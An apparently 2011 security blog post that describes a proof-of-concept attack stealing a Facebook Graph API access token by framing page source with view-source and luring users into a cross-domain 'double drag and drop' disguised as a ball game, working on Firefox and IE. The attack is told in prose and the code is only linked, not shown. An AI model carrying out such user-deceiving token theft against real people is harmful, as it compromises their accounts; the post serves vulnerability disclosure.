Now the interesting part is to get the token sitting inside the source code. Its possible to steal this with many attack vectors and i decided to write a PoC using a Double Drag and Drop Technique which works on Firefox and IE . Google chrome can resist this attack , because it disallows X-Domain Drag & drop and also view-source can't be IFRAMED.

Double Drag & Drop:
Heres the PoC which uses view-source to IFRAME the source code of the page containing the access token. Its better to use a double view-source to make everything as a text and disable all links , which are click-able. The trick is to fool the user (any chicken is fine) , by making him play a game with a ball and a trash can. 
I'll now show some screenshots of what a real attack would look like . A video would have been better , but am just lazy sometimes. 



What Really happened ? Heres what happened behind the scenes !

First Drag, everything in the IFRAME gets Selected                          Second Drag , the mighty cross-domain drag



The user clicks go and the source of the page is sent to the attacker 




What can the attacker do ?
Here's a gist of what the attacker can get if I get owned by this attack ! 



Heres the PoC code for that works on Firefox . Download Code 

Source: http://www.blog.fortitsecurity.com/2011/09/facebook-graph-api-access-token.html


If you like my blog, Please Donate Me
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |